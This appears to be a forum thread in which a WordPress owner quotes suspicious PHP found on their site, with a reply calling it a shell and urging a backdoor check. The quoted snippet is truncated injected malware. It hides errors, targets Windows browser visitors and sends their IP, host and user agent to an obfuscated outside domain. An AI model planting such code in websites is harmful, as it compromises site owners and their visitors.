"&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent)

looks like a shell to me check for backdoors remove any new files
desert fox Reviewed by desert fox on . Suspicious Wordpress Code i saw this code in my wordpress website. i was wondering what is this code. Because i cant remember putting this code in my site. here it is. <?php $wp_rssh = 'http'; $wp_gt = 'get'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER; if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){ $wp_gturl=$wp_rssh."://".$wp_rssh."s".$wp_gt.".com/".$wp_gt."/?ip=".$_SERVER."&referer=".urlencode($_SERVER)."&ua=".urlencode($wp_uagent); $ch = Rating: 5